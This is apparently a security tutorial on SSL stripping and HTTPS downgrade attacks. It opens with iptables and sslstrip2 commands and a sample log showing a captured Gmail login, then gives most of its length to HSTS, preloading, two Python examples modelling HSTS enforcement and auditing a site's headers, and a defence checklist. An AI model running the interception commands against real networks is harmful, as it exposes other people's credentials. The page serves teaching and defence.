SSL Stripping: HTTPS Downgrade Attacks
Technical documentation on SSL Stripping & HTTPS Downgrade. Understand the attack technique and learn how to defend against it.
When you type a URL like bank.com into your browser, most browsers first attempt an HTTP connection on port 80. The server then redirects you to https://bank.com. This redirect happens in plain text — and that plain text is where the attacker lives.
How It Works: sslstrip2
sslstrip2 (by Leonardo Nve, updated by Dante S.) automates this attack. It sits between the victim and the internet as a transparent proxy, intercepting the victim's HTTP traffic and rewriting every https:// link and redirect to plain http://, so the browser never upgrades the connection.
$ # Configure iptables to redirect HTTP traffic to sslstrip
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ # Run sslstrip2
$ python3 -m sslstrip2 -l 8080 -w /var/log/sslstrip.log -p
[+] sslstrip2 0.9.2 by Leonardo Nve ( Leonardo@[domain garbled in source].org )
[+] sslstrip2 listening on port 8080
[+] sslstrip2 proxy active

# Victim connects to http://gmail.com
# sslstrip strips the upgrade-to-HTTPS redirect
# Victim stays on HTTP — their login is now visible

# View captured credentials
$ tail -f /var/log/sslstrip.log
##################################################
#sslstrip2 log - POSTs are marked with ***
##################################################
[...]
gmail.com ... POST /ServiceLogin HTTP/1.1
***username=john%40gmail.com&passwd=MyPass2026%21
Cookie: NID=123=abc...
HSTS: The Defense Against SSL Stripping
HSTS (HTTP Strict Transport Security) is the primary defense against SSL stripping. When a browser receives an HSTS header from a domain, it remembers to ONLY connect via HTTPS for the specified duration — never attempting an HTTP connection first.
Strict-Transport-Security: max-age=31536000; includeSubDomains
This means: even if the victim types http:// or clicks an HTTP link, the browser automatically upgrades to HTTPS before sending any request. The attacker never gets the unencrypted HTTP request to strip.
HSTS Preloading
The HSTS Preload List is a hardcoded list in browsers of domains that must always use HTTPS. Chrome, Firefox, Safari, and Edge all use the preload list. If your domain is in the HSTS preload list, there's no HTTP-first attempt at all — the browser always starts with HTTPS. To submit your domain: hstspreload.org
HSTS + preload makes SSL stripping ineffective against major sites. However, many smaller sites and internal corporate applications don't implement HSTS. The attack remains viable against any site that either (1) doesn't use HTTPS at all, or (2) uses HTTPS but hasn't configured HSTS.
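The following is an added example, not code from the page or from sslstrip2. It models the browser side of what the sections above describe: without a cached policy the first request to a host leaves the machine as plaintext HTTP (the only window the stripping proxy needs); once a Strict-Transport-Security header has been learned over HTTPS, or the host is on the preload list, the browser rewrites the URL to https:// before any packet is sent. The preload list, host names and clock are constructed so the example runs offline; includeSubDomains, expiry and max-age=0 removal follow RFC 6797.

```python
"""Browser-side model of HSTS enforcement.

Added example, not from the page or from sslstrip2. It models the three states a
browser can be in for a host: no policy (the first request goes out as plaintext
HTTP, which is exactly the window SSL stripping needs), a cached policy learned
from an earlier HTTPS response, and a preloaded host for which the plaintext
request is never made. The preload list and host names below are constructed.
"""
import time

# Stand-in for the browser's built-in preload list: host -> includeSubDomains flag.
PRELOADED = {"bank.example": True}


def parse_hsts(header):
    """Parse a Strict-Transport-Security value into a policy dict.

    Returns None when max-age is missing or malformed, which is how browsers
    treat such a header (it is ignored)."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.lower()
        if name == "max-age":
            try:
                policy["max_age"] = int(value.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy if policy["max_age"] is not None else None


class HstsStore:
    """Per-host policy cache, as a browser keeps it between visits."""

    def __init__(self, now=time.time):
        self.now = now  # injectable clock so expiry can be exercised offline
        self.policies = {}  # host -> (expires_at, include_subdomains)

    def learn(self, host, header):
        """Record a policy from an HSTS header received over HTTPS.

        Headers seen over plain HTTP must not reach this method: browsers
        ignore them, otherwise an on-path attacker could plant policies.
        max-age=0 deletes any cached policy for the host."""
        policy = parse_hsts(header)
        if policy is None:
            return False
        if policy["max_age"] == 0:
            self.policies.pop(host, None)
        else:
            expires = self.now() + policy["max_age"]
            self.policies[host] = (expires, policy["include_subdomains"])
        return True

    def is_known_https(self, host):
        """True when http://host must be rewritten to https:// before any packet is sent.

        Walks from the exact host up through its parent domains; a parent's
        policy only applies if it carries includeSubDomains."""
        labels = host.split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            exact = i == 0
            if candidate in PRELOADED and (exact or PRELOADED[candidate]):
                return True
            entry = self.policies.get(candidate)
            if entry and entry[0] > self.now() and (exact or entry[1]):
                return True
        return False


def outgoing_request(store, url):
    """Return the scheme that actually goes on the wire for a typed or clicked URL."""
    scheme, _, rest = url.partition("://")
    host = rest.split("/", 1)[0]
    if scheme == "http" and store.is_known_https(host):
        return "https"
    return scheme


if __name__ == "__main__":
    store = HstsStore()
    print(outgoing_request(store, "http://shop.example/login"))  # http: first visit, strippable
    store.learn("shop.example", "max-age=31536000; includeSubDomains")
    print(outgoing_request(store, "http://shop.example/login"))  # https: HSTS cached
    print(outgoing_request(store, "http://online.bank.example/"))  # https: preloaded parent
```

The design point worth noting is in `learn`: a policy is only trustworthy if it arrived over HTTPS, which is why a fresh browser profile (or a policy that has expired) is exactly the state the attack needs, and why preloading removes even that first-visit window.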
Why Most Sites Still Support HTTP
Despite widespread HTTPS adoption, many sites still accept HTTP connections because:
- Legacy compatibility: Some users type http:// directly
- Redirect costs: Some sites redirect to HTTPS but do so in a way that's strippable
- Performance: HTTPS adds TLS handshake overhead (mitigated by TLS 1.3 and 0-RTT)
- Cost: Certificates used to cost money (now free via Let's Encrypt)
- Corporate proxies: Some corporate networks intercept and modify HTTPS at the proxy level
Defense Against SSL Stripping
- HSTS: Enable HSTS on all your web properties with a long max-age. Submit to the HSTS preload list.
- HTTPS everywhere: Never accept HTTP connections. Redirect HTTP to HTTPS, but also set HSTS headers.
- Certificate monitoring: Services like SSLMate and Certificate Transparency logs alert you when unexpected certificates are issued for your domains.
- Browser extensions: HTTPS Everywhere (EFF) forces HTTPS on sites that support it but don't enforce it.
- Public WiFi policy: Never use HTTP sites on public WiFi. Only use HTTPS sites (look for the padlock).
- VPN: A VPN tunnels all of your traffic past the local network, so an attacker on the same WiFi sees only the encrypted tunnel and cannot intercept or rewrite the plaintext HTTP request. It does not protect against an attacker positioned between the VPN exit and the site.
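As an added example of checking the first two defenses above (it is not code from the page or from any named tool), the audit below takes the raw response a site returns to a plaintext GET on port 80 and the response to the same GET over HTTPS, and reports what an on-path attacker could still strip. It also catches a common mistake: sending the HSTS header on the plain-HTTP redirect, which browsers ignore. The two sample response pairs, the host name and the thresholds for preloading are constructed for illustration.

```python
"""Server-side audit for SSL-stripping exposure.

Added example, not part of the original page. Given the raw port-80 response and
the raw HTTPS response for the same URL, list the gaps a stripping proxy could
exploit. The sample responses below are constructed.
"""
import re

ONE_YEAR = 31536000  # minimum max-age accepted by hstspreload.org
REDIRECTS = {301, 302, 303, 307, 308}


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status code, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def audit(http_raw, https_raw):
    """Return a list of findings; an empty list means a browser that has seen the
    site once over HTTPS can no longer be stripped and the site is preload-ready."""
    findings = []
    status, headers = parse_response(http_raw)
    location = headers.get("location", "")
    if status == 200:
        findings.append("port 80 serves content directly; the site is plaintext, nothing to strip")
    elif not (status in REDIRECTS and location.lower().startswith("https://")):
        findings.append("port 80 does not redirect to https://")
    if "strict-transport-security" in headers:
        findings.append("HSTS sent over plain HTTP is ignored by browsers (RFC 6797 section 8.1)")
    _, s_headers = parse_response(https_raw)
    hsts = s_headers.get("strict-transport-security")
    if hsts is None:
        findings.append("no HSTS on the HTTPS response; every first visit starts with a strippable HTTP request")
        return findings
    match = re.search(r'max-age="?(\d+)', hsts, re.IGNORECASE)
    if match is None:
        findings.append("HSTS header has no max-age; browsers discard it")
        return findings
    max_age = int(match.group(1))
    lower = hsts.lower()
    if max_age < ONE_YEAR:
        findings.append(f"HSTS max-age {max_age} is below one year; too short for preloading")
    if "includesubdomains" not in lower:
        findings.append("HSTS lacks includeSubDomains; subdomains such as www stay strippable and preload requires it")
    if "preload" not in lower:
        findings.append("HSTS lacks the preload directive required by hstspreload.org")
    return findings


# Constructed sample: weak configuration (HSTS on the redirect, none over HTTPS).
WEAK_HTTP = ("HTTP/1.1 301 Moved Permanently\r\nLocation: https://shop.example/\r\n"
             "Strict-Transport-Security: max-age=31536000\r\nContent-Length: 0\r\n\r\n")
WEAK_HTTPS = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 0\r\n\r\n"

# Constructed sample: corrected configuration.
GOOD_HTTP = "HTTP/1.1 301 Moved Permanently\r\nLocation: https://shop.example/\r\nContent-Length: 0\r\n\r\n"
GOOD_HTTPS = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
              "Strict-Transport-Security: max-age=63072000; includeSubDomains; preload\r\n"
              "Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    for name, pair in (("weak", (WEAK_HTTP, WEAK_HTTPS)), ("good", (GOOD_HTTP, GOOD_HTTPS))):
        print(name, audit(*pair) or ["ok"])
```

Feed it real responses captured with curl (`curl -si http://host/` and `curl -si https://host/`) to audit a site; the findings map directly onto the HSTS and "HTTPS everywhere" items in the list above.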